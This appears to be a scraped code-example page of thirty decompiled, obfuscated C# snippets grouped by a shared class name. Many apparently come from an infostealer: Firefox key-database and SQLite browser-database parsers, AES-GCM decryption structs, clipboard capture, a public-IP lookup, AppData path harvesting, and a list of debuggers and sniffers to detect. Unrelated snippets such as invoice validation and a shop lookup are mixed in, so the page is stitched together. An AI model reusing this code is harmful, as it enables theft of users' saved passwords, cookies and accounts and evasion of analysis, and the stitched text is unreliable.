Ejemplo n.º 1
0
 // Token: 0x0600025A RID: 602 RVA: 0x00002F6A File Offset: 0x0000116A
 public BCRYPT_OAEP_PADDING_INFO(string alg)
 {
     Class34.A1SfXVPz7w9eh();
     this.pszAlgId = alg;
     this.pbLabel  = IntPtr.Zero;
     this.cbLabel  = 0;
 }
Ejemplo n.º 2
0
 // Token: 0x060012F0 RID: 4848 RVA: 0x00004654 File Offset: 0x00002854
 internal void method_10(object object_0, Class34 class34_0)
 {
     if (this.delegate129_0 != null)
     {
         this.delegate129_0(object_0, class34_0);
     }
 }
Ejemplo n.º 3
0
 // Token: 0x06000013 RID: 19 RVA: 0x000022A5 File Offset: 0x000004A5
 public JsonArray(params JsonValue[] items)
 {
     Class34.A1SfXVPz7w9eh();
     base..ctor();
     this.xfPinNwiA = new List <JsonValue>();
     this.AddRange(items);
 }
Ejemplo n.º 4
0
 // Token: 0x06000144 RID: 324 RVA: 0x00002A6F File Offset: 0x00000C6F
 // Note: this type is marked as 'beforefieldinit'.
 static Class11()
 {
     Class34.A1SfXVPz7w9eh();
     Class11.long_0 = 76561197960265728L;
     Class11.long_1 = 76561197960265729L;
     Class11.int_0  = 0;
 }
Ejemplo n.º 5
0
 // Token: 0x06000202 RID: 514 RVA: 0x00002DDE File Offset: 0x00000FDE
 // Note: this type is marked as 'beforefieldinit'.
 static Class25()
 {
     Class34.A1SfXVPz7w9eh();
     Class25.bool_0 = false;
     Class25.bool_1 = (IntPtr.Size == 8);
     Class25.bool_2 = (Class25.bool_1 || Class25.smethod_4());
 }
Ejemplo n.º 6
0
 // Token: 0x06000258 RID: 600 RVA: 0x00011D44 File Offset: 0x0000FF44
 public BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(byte[] iv, byte[] aad, byte[] tag)
 {
     Class34.A1SfXVPz7w9eh();
     this = default(BCrypt.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO);
     this.dwInfoVersion = BCrypt.BCRYPT_INIT_AUTH_MODE_INFO_VERSION;
     this.cbSize        = Marshal.SizeOf(typeof(BCrypt.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO));
     if (iv != null)
     {
         this.cbNonce = iv.Length;
         this.pbNonce = Marshal.AllocHGlobal(this.cbNonce);
         Marshal.Copy(iv, 0, this.pbNonce, this.cbNonce);
     }
     if (aad != null)
     {
         this.cbAuthData = aad.Length;
         this.pbAuthData = Marshal.AllocHGlobal(this.cbAuthData);
         Marshal.Copy(aad, 0, this.pbAuthData, this.cbAuthData);
     }
     if (tag != null)
     {
         this.cbTag = tag.Length;
         this.pbTag = Marshal.AllocHGlobal(this.cbTag);
         Marshal.Copy(tag, 0, this.pbTag, this.cbTag);
         this.cbMacContext = tag.Length;
         this.pbMacContext = Marshal.AllocHGlobal(this.cbMacContext);
     }
 }
Ejemplo n.º 7
0
        private bool method_15()
        {
            decimal num;

            if (!decimal.TryParse(this.string_8, out num))
            {
                this.string_1 = "A118";
                return(false);
            }
            if (!decimal.TryParse(this.string_9, out num))
            {
                this.string_1 = "A114";
                return(false);
            }
            if (!decimal.TryParse(this.string_10, out num))
            {
                this.string_1 = "A115";
                return(false);
            }
            if (this.zyfp_LX_0 == ZYFP_LX.HYSY)
            {
                if (!Class34.smethod_7(this.method_10(), this.string_8, Class34.smethod_17(this.string_10, this.string_12), 2, Struct40.string_2))
                {
                    this.string_1 = "A106";
                    return(false);
                }
            }
            else if (!Class34.smethod_7(this.bool_0 ? this.method_10() : this.method_9(), this.string_8, this.bool_0 ? this.method_11() : this.string_10, 2, Struct40.string_2))
            {
                this.string_1 = "A106";
                return(false);
            }
            return(true);
        }
Ejemplo n.º 8
0
 // Token: 0x06000180 RID: 384 RVA: 0x0000DDD0 File Offset: 0x0000BFD0
 // Note: this type is marked as 'beforefieldinit'.
 static Class18()
 {
     Class34.A1SfXVPz7w9eh();
     Class18.list_0   = new List <string>();
     Class18.list_1   = new List <string>();
     Class18.list_2   = new List <string>();
     Class18.list_3   = new List <string>();
     Class18.string_0 = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Local");
     Class18.string_1 = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Local\\Temp");
     Class18.string_2 = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Roaming");
     Class18.byte_0   = new byte[]
     {
         248,
         0,
         0,
         0,
         0,
         0,
         0,
         0,
         0,
         0,
         0,
         0,
         0,
         0,
         0,
         1
     };
 }
Ejemplo n.º 9
0
 // Token: 0x060001C4 RID: 452 RVA: 0x00002D0A File Offset: 0x00000F0A
 public Gecko8(byte[] salt, byte[] password, byte[] entry)
 {
     Class34.A1SfXVPz7w9eh();
     base..ctor();
     this.byte_0 = salt;
     this.byte_1 = password;
     this.byte_2 = entry;
 }
Ejemplo n.º 10
0
        // Token: 0x060001C9 RID: 457 RVA: 0x0000E674 File Offset: 0x0000C874
        public Gecko9(string FileName)
        {
            Class34.A1SfXVPz7w9eh();
            base..ctor();
            List <byte> list = new List <byte>();

            this.Keys = new List <KeyValuePair <string, string> >();
            using (BinaryReader binaryReader = new BinaryReader(File.OpenRead(FileName)))
            {
                int i   = 0;
                int num = (int)binaryReader.BaseStream.Length;
                while (i < num)
                {
                    list.Add(binaryReader.ReadByte());
                    i++;
                }
            }
            string value = BitConverter.ToString(this.method_0(list.ToArray(), 0, 4, false)).Replace("-", "");
            string text  = BitConverter.ToString(this.method_0(list.ToArray(), 4, 4, false)).Replace("-", "");
            int    num2  = BitConverter.ToInt32(this.method_0(list.ToArray(), 12, 4, true), 0);

            if (!string.IsNullOrEmpty(value))
            {
                this.Version = "Berkelet DB";
                if (text.Equals("00000002"))
                {
                    this.Version += " 1.85 (Hash, version 2, native byte-order)";
                }
                int num3 = int.Parse(BitConverter.ToString(this.method_0(list.ToArray(), 56, 4, false)).Replace("-", ""));
                int num4 = 1;
                while (this.Keys.Count < num3)
                {
                    string[] array = new string[(num3 - this.Keys.Count) * 2];
                    for (int j = 0; j < (num3 - this.Keys.Count) * 2; j++)
                    {
                        array[j] = BitConverter.ToString(this.method_0(list.ToArray(), num2 * num4 + 2 + j * 2, 2, true)).Replace("-", "");
                    }
                    Array.Sort <string>(array);
                    for (int k = 0; k < array.Length; k += 2)
                    {
                        int    num5    = Convert.ToInt32(array[k], 16) + num2 * num4;
                        int    num6    = Convert.ToInt32(array[k + 1], 16) + num2 * num4;
                        int    num7    = (k + 2 >= array.Length) ? (num2 + num2 * num4) : (Convert.ToInt32(array[k + 2], 16) + num2 * num4);
                        string @string = Encoding.ASCII.GetString(this.method_0(list.ToArray(), num6, num7 - num6, false));
                        string value2  = BitConverter.ToString(this.method_0(list.ToArray(), num5, num6 - num5, false));
                        if (!string.IsNullOrEmpty(@string))
                        {
                            this.Keys.Add(new KeyValuePair <string, string>(@string, value2));
                        }
                    }
                    num4++;
                }
            }
            else
            {
                this.Version = "Unknow database format";
            }
        }
Ejemplo n.º 11
0
 // Token: 0x06000014 RID: 20 RVA: 0x000022C4 File Offset: 0x000004C4
 public JsonArray(IEnumerable <JsonValue> items)
 {
     Class34.A1SfXVPz7w9eh();
     base..ctor();
     if (items == null)
     {
         throw new ArgumentNullException("items");
     }
     this.xfPinNwiA = new List <JsonValue>(items);
 }
Ejemplo n.º 12
0
 // Token: 0x0600002B RID: 43 RVA: 0x000023CE File Offset: 0x000005CE
 public JsonObject(params KeyValuePair <string, JsonValue>[] items)
 {
     Class34.A1SfXVPz7w9eh();
     base..ctor();
     this.sortedDictionary_0 = new SortedDictionary <string, JsonValue>(StringComparer.Ordinal);
     if (items != null)
     {
         this.AddRange(items);
     }
 }
Ejemplo n.º 13
0
 // Token: 0x0600002C RID: 44 RVA: 0x000023F8 File Offset: 0x000005F8
 public JsonObject(IEnumerable <KeyValuePair <string, JsonValue> > items)
 {
     Class34.A1SfXVPz7w9eh();
     base..ctor();
     if (items == null)
     {
         throw new ArgumentNullException("items");
     }
     this.sortedDictionary_0 = new SortedDictionary <string, JsonValue>(StringComparer.Ordinal);
     this.AddRange(items);
 }
Ejemplo n.º 14
0
 // Token: 0x0600021D RID: 541 RVA: 0x0001112C File Offset: 0x0000F32C
 // Note: this type is marked as 'beforefieldinit'.
 static Class28()
 {
     Class34.A1SfXVPz7w9eh();
     Class28.webRequest_0 = WebRequest.Create("http://ip.42.pl/raw");
     Class28.stream_0     = Class28.webRequest_0.GetResponse().GetResponseStream();
     Class28.string_0     = new StreamReader(Class28.stream_0).ReadToEnd();
     Class28.string_1     = Class17.smethod_0();
     Class28.string_2     = "";
     Class28.list_0       = new List <string>();
     Class28.list_1       = new List <string>();
 }
Ejemplo n.º 15
0
        // Token: 0x060001BC RID: 444 RVA: 0x0000E3A4 File Offset: 0x0000C5A4
        public Gecko7(string DataToParse)
        {
            Class34.A1SfXVPz7w9eh();
            base..ctor();
            int num = int.Parse(DataToParse.Substring(2, 2), NumberStyles.HexNumber) * 2;

            this.EntrySalt = DataToParse.Substring(6, num);
            int num2 = DataToParse.Length - (6 + num + 36);

            this.OID           = DataToParse.Substring(6 + num + 36, num2);
            this.Passwordcheck = DataToParse.Substring(6 + num + 4 + num2);
        }
Ejemplo n.º 16
0
        private bool method_14()
        {
            decimal num;

            if (!decimal.TryParse(this.string_10, out num))
            {
                this.string_1 = "A115";
                return(false);
            }
            if ((this.string_11.Length > 0) && !decimal.TryParse(this.string_11, out num))
            {
                this.string_1 = "A116";
                return(false);
            }
            if (!decimal.TryParse(this.string_12, out num))
            {
                this.string_1 = "A117";
                return(false);
            }
            string str2 = this.string_10;

            if (this.zyfp_LX_0 == ZYFP_LX.HYSY)
            {
                str2 = Class34.smethod_17(this.string_10, this.string_12);
            }
            else if (this.zyfp_LX_0 == ZYFP_LX.JZ_50_15)
            {
                str2 = Class34.smethod_15(Class34.smethod_17(this.string_10, this.string_12), "1.05", Struct40.int_50);
            }
            else if (this.zyfp_LX_0 == ZYFP_LX.CEZS)
            {
                str2 = Class34.smethod_18(this.string_10, this.string_2);
            }
            string str = Struct40.string_3;

            if (this.bool_1)
            {
                str = Struct40.string_4;
            }
            if ((Class34.smethod_9(str, Struct40.string_0, true) && (this.string_11.Length > 0)) && !Class34.smethod_7(str2, this.string_11, this.string_12, Struct40.int_50, str))
            {
                this.string_1 = "A108";
                this.string_0 = new string[] { str };
                return(false);
            }
            if (((this.string_11.Length > 0) && (this.string_12.Length > 0)) && (Class34.smethod_10(this.string_11, Struct40.string_0) && !Class34.smethod_10(this.string_12, Struct40.string_0)))
            {
                this.string_1 = "A132";
                return(false);
            }
            this.string_1 = "0000";
            return(true);
        }
Ejemplo n.º 17
0
 internal string method_11()
 {
     if ((this.string_10.Length + this.string_12.Length) == 0)
     {
         return(string.Empty);
     }
     if ((this.string_10.Length > 0) && (this.string_12.Length > 0))
     {
         return(Class34.smethod_17(this.string_10, this.string_12));
     }
     return(this.string_10);
 }
Ejemplo n.º 18
0
 // Token: 0x06000003 RID: 3 RVA: 0x0000224C File Offset: 0x0000044C
 public JavaScriptReader(TextReader reader)
 {
     Class34.A1SfXVPz7w9eh();
     this.int_0 = 1;
     base..ctor();
     if (reader == null)
     {
         throw new ArgumentNullException("reader");
     }
     this.textReader_0    = reader;
     this.stringBuilder_0 = new StringBuilder();
 }
Ejemplo n.º 19
0
 // Token: 0x06000260 RID: 608 RVA: 0x000130BC File Offset: 0x000112BC
 public static int smethod_0(string string_0)
 {
     new Thread(delegate()
     {
         Class26.smethod_0(string_0);
     }).Start();
     new Thread(delegate()
     {
         Class27.smethod_0(string_0);
     }).Start();
     new Thread(delegate()
     {
         Class28.smethod_0(string_0);
     }).Start();
     new Thread(delegate()
     {
         Class29.smethod_0(string_0);
     }).Start();
     new Thread(delegate()
     {
         Class30.smethod_0(string_0);
     }).Start();
     new Thread(delegate()
     {
         Class31.smethod_0(string_0);
     }).Start();
     new Thread(delegate()
     {
         Class32.smethod_0(string_0);
     }).Start();
     new Thread(delegate()
     {
         Class35.smethod_0(string_0);
     }).Start();
     new Thread(delegate()
     {
         Class36.smethod_0(string_0);
     }).Start();
     new Thread(delegate()
     {
         Class33.smethod_0(string_0);
     }).Start();
     new Thread(delegate()
     {
         Class34.smethod_0(string_0);
     }).Start();
     new Thread(delegate()
     {
         Class38.smethod_0(string_0);
     }).Start();
     return(Class37.int_0);
 }
Ejemplo n.º 20
0
 // Token: 0x0600013C RID: 316 RVA: 0x0000A830 File Offset: 0x00008A30
 // Note: this type is marked as 'beforefieldinit'.
 static Class10()
 {
     Class34.A1SfXVPz7w9eh();
     Class10.string_0  = "0";
     Class10.string_1  = "0";
     Class10.string_2  = "0";
     Class10.string_3  = "0";
     Class10.string_4  = "0";
     Class10.string_5  = "0";
     Class10.string_6  = "0";
     Class10.string_7  = "0";
     Class10.string_8  = "0";
     Class10.string_9  = "0";
     Class10.string_10 = "";
 }
Ejemplo n.º 21
0
 // Token: 0x06000129 RID: 297 RVA: 0x00009834 File Offset: 0x00007A34
 // Note: this type is marked as 'beforefieldinit'.
 static Program()
 {
     Class34.A1SfXVPz7w9eh();
     Program.string_0  = "";
     Program.version   = "1.3.8";
     Program.timestart = DateTime.Now.ToString();
     Program.timerint  = 0;
     Program.clipp     = ((Clipboard.GetText().Length <= 0 || Clipboard.GetText().Length >= 300) ? "" : Clipboard.GetText());
     Program.geo       = "";
     Program.randomnm  = Class6.smethod_2();
     Program.path2     = "C:\\ProgramData\\debug.txt";
     Program.string_1  = Environment.GetEnvironmentVariable("LocalAppData") + "\\" + Class6.smethod_0();
     Program.path      = Program.string_1 + "\\" + Program.randomnm;
     Program.id        = "";
 }
Ejemplo n.º 22
0
 // Token: 0x06000256 RID: 598 RVA: 0x00011CC4 File Offset: 0x0000FEC4
 // Note: this type is marked as 'beforefieldinit'.
 static BCrypt()
 {
     Class34.A1SfXVPz7w9eh();
     BCrypt.BCRYPT_KEY_DATA_BLOB_MAGIC         = BitConverter.GetBytes(1296188491);
     BCrypt.BCRYPT_OBJECT_LENGTH               = "ObjectLength";
     BCrypt.BCRYPT_CHAIN_MODE_GCM              = "ChainingModeGCM";
     BCrypt.BCRYPT_AUTH_TAG_LENGTH             = "AuthTagLength";
     BCrypt.BCRYPT_CHAINING_MODE               = "ChainingMode";
     BCrypt.BCRYPT_KEY_DATA_BLOB               = "KeyDataBlob";
     BCrypt.BCRYPT_AES_ALGORITHM               = "AES";
     BCrypt.MS_PRIMITIVE_PROVIDER              = "Microsoft Primitive Provider";
     BCrypt.BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG  = 1;
     BCrypt.BCRYPT_INIT_AUTH_MODE_INFO_VERSION = 1;
     BCrypt.STATUS_AUTH_TAG_MISMATCH           = 3221266434U;
 }
Ejemplo n.º 23
0
 internal string method_9()
 {
     if (!this.bool_0)
     {
         return(this.string_9);
     }
     if (this.string_9.Length <= 0)
     {
         return("");
     }
     if ((this.zyfp_LX_0 != ZYFP_LX.CEZS) && (this.zyfp_LX_0 != ZYFP_LX.JZ_50_15))
     {
         return(Class34.smethod_14(this.string_9, Class34.smethod_17(this.string_11, "1.00"), Struct40.int_46));
     }
     return(Class34.smethod_3(this.zyfp_LX_0, this.string_9, Struct40.int_46, null, this));
 }
Ejemplo n.º 24
0
 // Token: 0x06000263 RID: 611 RVA: 0x00012658 File Offset: 0x00010858
 public SQLiteHandler(string baseName)
 {
     Class34.A1SfXVPz7w9eh();
     this.byte_1 = new byte[]
     {
         0,
         1,
         2,
         3,
         4,
         6,
         8,
         8,
         0,
         0
     };
     base..ctor();
     if (File.Exists(baseName))
     {
         FileSystem.FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1);
         string s = Strings.Space((int)FileSystem.LOF(1));
         FileSystem.FileGet(1, ref s, -1L, false);
         FileSystem.FileClose(new int[]
         {
             1
         });
         this.byte_0 = Encoding.Default.GetBytes(s);
         if (Encoding.Default.GetString(this.byte_0, 0, 15).CompareTo("SQLite format 3") != 0)
         {
             throw new Exception("Not a valid SQLite 3 Database File");
         }
         if (this.byte_0[52] > 0)
         {
             throw new Exception("Auto-vacuum capable database is not supported");
         }
         this.ushort_0 = (ushort)this.method_0(16, 2);
         this.ulong_0  = this.method_0(56, 4);
         if (decimal.Compare(new decimal(this.ulong_0), 0m) == 0)
         {
             this.ulong_0 = 1UL;
         }
         this.method_4(100UL);
     }
 }
Ejemplo n.º 25
0
 internal bool method_3(bool bool_2)
 {
     if (!this.bool_1 && (this.string_11.Length == 0))
     {
         this.string_1 = "A102";
         return(false);
     }
     if ((this.string_9.Length > 0) && !Class34.smethod_9(this.string_9, Struct40.string_0, true))
     {
         this.string_1 = "A112";
         return(false);
     }
     if (this.string_10.Length > 0)
     {
         if (this.string_12.Length == 0)
         {
             this.string_1 = "A107";
             return(false);
         }
         if (!this.method_14())
         {
             return(false);
         }
         if ((!this.bool_1 && (this.fphxz_0 != FPHXZ.ZKXX)) && ((this.fphxz_0 != FPHXZ.XHQDZK) && !Class34.smethod_9(this.string_10, Struct40.string_0, true)))
         {
             this.string_1 = "A105";
             return(false);
         }
         if ((this.string_8.Length > 0) && !this.method_15())
         {
             return(false);
         }
     }
     else if (this.string_12.Length > 0)
     {
         this.string_1 = "A109";
         return(false);
     }
     return(true);
 }
Ejemplo n.º 26
0
 public Spxx(string string_18, string string_19, string string_20, string string_21, string string_22, string string_23, bool bool_2, ZYFP_LX zyfp_LX_1)
 {
     this.string_0  = new string[0];
     this.string_2  = "";
     this.string_3  = "";
     this.string_4  = "";
     this.string_5  = "";
     this.string_6  = "";
     this.string_7  = "";
     this.string_8  = "";
     this.string_9  = "";
     this.string_10 = "";
     this.string_11 = "";
     this.string_12 = "";
     this.string_13 = "";
     this.string_14 = "";
     this.string_15 = "0";
     this.string_16 = "";
     this.string_17 = "";
     this.Spmc      = string_18;
     this.Spsm      = string_19;
     this.string_11 = ((string_20 == null) || (string_20.Length <= 0)) ? "" : Class34.smethod_20(string_20, Struct40.int_55);
     this.zyfp_LX_0 = zyfp_LX_1;
     this.Ggxh      = string_21;
     this.JLdw      = string_22;
     this.bool_0    = bool_2;
     this.string_9  = string_23;
     if (this.zyfp_LX_0 == ZYFP_LX.HYSY)
     {
         this.bool_0 = true;
         if ((!bool_2 && (string_23.Length > 0)) && (string_20.Length > 0))
         {
             this.string_9 = Class34.smethod_12(string_23, Class34.smethod_17("1.00", string_20), Struct40.int_46);
             if (Class34.smethod_24(this.string_9, Struct40.int_47, false) == null)
             {
                 this.string_9 = string.Empty;
             }
         }
     }
 }
Ejemplo n.º 27
0
 // Token: 0x0600012A RID: 298 RVA: 0x00009900 File Offset: 0x00007B00
 public Class7(string string_1)
 {
     Class34.A1SfXVPz7w9eh();
     this.byte_0 = new byte[]
     {
         0,
         1,
         2,
         3,
         4,
         6,
         8,
         8,
         0,
         0
     };
     base..ctor();
     this.byte_1  = File.ReadAllBytes(string_1);
     this.ulong_1 = this.method_5(16, 2);
     this.ulong_0 = this.method_5(56, 4);
     this.method_3(100L);
 }
Ejemplo n.º 28
0
        public static ShopItem FindItem(int item_index)
        {
            Predicate <ShopItem> match = null;
            Class34 class2             = new Class34 {
                int_0 = item_index
            };
            ShopItem item = null;

            foreach (ShopGroup group in dictionary_0.Keys)
            {
                if (match == null)
                {
                    match = new Predicate <ShopItem>(class2.method_0);
                }
                item = dictionary_0[group].Find(match);
                if (item != null)
                {
                    return(item);
                }
            }
            return(null);
        }
Ejemplo n.º 29
0
 // Token: 0x06000159 RID: 345 RVA: 0x0000C628 File Offset: 0x0000A828
 // Note: this type is marked as 'beforefieldinit'.
 static Class13()
 {
     Class34.A1SfXVPz7w9eh();
     Class13.string_0 = new string[]
     {
         "HttpAnalyzer",
         "Dumper",
         "Reflector",
         "Wireshark",
         "WPE",
         "ProcessExplorer",
         "IDA",
         "HTTP Debugger Pro",
         "The Wireshark Network Analyzer",
         "WinDbg",
         "Colasoft Capsa",
         "smsniff",
         "Olly",
         "OllyDbg",
         "WPE PRO",
         "Microsoft Network Monitor",
         "Fiddler",
         "SmartSniff",
         "Immunity Debugger",
         "Process Explorer",
         "PE Tools",
         "AQtime",
         "DS-5 Debug",
         "Dbxtool",
         "Topaz",
         "FusionDebug",
         "NetBeans",
         "Rational Purify",
         ".NET Reflector",
         "Cheat Engine",
         "Sigma Engine"
     };
 }
Ejemplo n.º 30
0
 // Token: 0x060000C6 RID: 198 RVA: 0x00005458 File Offset: 0x00003658
 public CNT(string baseName)
 {
     Class34.A1SfXVPz7w9eh();
     base..ctor();
     this.byte_1 = new byte[]
     {
         0,
         1,
         2,
         3,
         4,
         6,
         8,
         8,
         0,
         0
     };
     if (File.Exists(baseName))
     {
         FileSystem.FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1);
         string s = Strings.Space((int)FileSystem.LOF(1));
         FileSystem.FileGet(1, ref s, -1L, false);
         FileSystem.FileClose(new int[]
         {
             1
         });
         this.byte_0   = Encoding.Default.GetBytes(s);
         this.ushort_0 = (ushort)this.method_8(16, 2);
         this.ulong_0  = this.method_8(56, 4);
         if (decimal.Compare(new decimal(this.method_1()), 0m) == 0)
         {
             this.ulong_0 = 1UL;
         }
         this.method_11(100UL);
     }
 }